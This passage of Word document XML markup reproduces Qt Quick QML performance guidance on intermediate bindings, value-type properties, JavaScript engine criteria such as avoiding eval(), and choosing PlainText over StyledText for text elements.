      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> secondBinding</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intermediateBinding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20</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00906D8E" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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property</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> thirdBinding</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intermediateBinding </w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>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Component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onCompleted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t0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for</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i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i </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;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1000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i</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qrealListProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</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i</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> t1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new</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Date</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console</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log</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"elapsed: "</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t0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valueOf</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 milliseconds"</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In the above example, only the intermediate binding will be re-evaluated each time, resulting in a significant performance increase.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="007A24CD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="898" w:name="value-type-tips"/>
      <w:bookmarkStart w:id="899" w:name="_Toc483000720"/>
      <w:bookmarkStart w:id="900" w:name="_Toc483003737"/>
      <w:bookmarkStart w:id="901" w:name="_Toc483604072"/>
      <w:bookmarkStart w:id="902" w:name="_Toc483605292"/>
      <w:bookmarkEnd w:id="898"/>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Value-Type tips</w:t>
      </w:r>
      <w:bookmarkEnd w:id="899"/>
      <w:bookmarkEnd w:id="900"/>
      <w:bookmarkEnd w:id="901"/>
      <w:bookmarkEnd w:id="902"/>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D64C61">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Value-type properties (font, color, vector3d, etc) have similar</w:t>
      </w:r>
      <w:r w:rsidRPr="00D64C61">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId642" w:history="1">
        <w:r w:rsidRPr="00D64C61">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D64C61">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D64C61">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property and change notification semantics to sequence type properties</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. As such, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D64C61">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tips</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> given above for sequences </w:t>
      </w:r>
      <w:r w:rsidRPr="00D64C61">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are also applicable for value-type properties</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. While they are usually less of a problem with value-types (since the number of sub-properties of a value-type is usually far less than the number of elements in a sequence), </w:t>
      </w:r>
      <w:r w:rsidRPr="00D64C61">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>any increase in the number of bindings being re-evaluated needlessly will have a negative impact on performance</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="007A24CD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="903" w:name="other-javascript-objects"/>
      <w:bookmarkStart w:id="904" w:name="_Toc483000721"/>
      <w:bookmarkStart w:id="905" w:name="_Toc483003738"/>
      <w:bookmarkStart w:id="906" w:name="_Toc483604073"/>
      <w:bookmarkStart w:id="907" w:name="_Toc483605293"/>
      <w:bookmarkEnd w:id="903"/>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Other JavaScript Objects</w:t>
      </w:r>
      <w:bookmarkEnd w:id="904"/>
      <w:bookmarkEnd w:id="905"/>
      <w:bookmarkEnd w:id="906"/>
      <w:bookmarkEnd w:id="907"/>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B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Different JavaScript engines provide different optimizations</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The JavaScript engine which</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId643" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick 2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">uses is </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>optimized for object instantiation and property lookup</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, but the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>optimizations which it provides relies on certain criteria</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. If your application does not meet the criteria, the JavaScript engine falls back to a "</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>slow-path" mode</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with much worse performance. As such, always try to ensure you meet the following criteria:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00B26784" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Avoid using eval() if at all possible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00B26784" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Do not delete properties of objects</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="007A24CD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="908" w:name="common-interface-elements"/>
      <w:bookmarkStart w:id="909" w:name="_Toc483000722"/>
      <w:bookmarkStart w:id="910" w:name="_Toc483003739"/>
      <w:bookmarkStart w:id="911" w:name="_Toc483604074"/>
      <w:bookmarkStart w:id="912" w:name="_Toc483605294"/>
      <w:bookmarkEnd w:id="908"/>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Common Interface Elements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="909"/>
      <w:bookmarkEnd w:id="910"/>
      <w:bookmarkEnd w:id="911"/>
      <w:bookmarkEnd w:id="912"/>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="007A24CD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="913" w:name="text-elements"/>
      <w:bookmarkStart w:id="914" w:name="_Toc483000723"/>
      <w:bookmarkStart w:id="915" w:name="_Toc483003740"/>
      <w:bookmarkStart w:id="916" w:name="_Toc483604075"/>
      <w:bookmarkStart w:id="917" w:name="_Toc483605295"/>
      <w:bookmarkEnd w:id="913"/>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text Elements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="914"/>
      <w:bookmarkEnd w:id="915"/>
      <w:bookmarkEnd w:id="916"/>
      <w:bookmarkEnd w:id="917"/>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B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Calculating text layouts can be a slow operation</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Consider using the</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PlainText</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>format instead of</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>StyledText</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wherever possible</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as this reduces the amount of work required of the layout engine. If you cannot use</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PlainText</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(as you need to embed images, or use tags to specify ranges of characters to have certain formatting (bold, italic, etc) as opposed to the entire text) then </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>you should use</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>StyledText</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
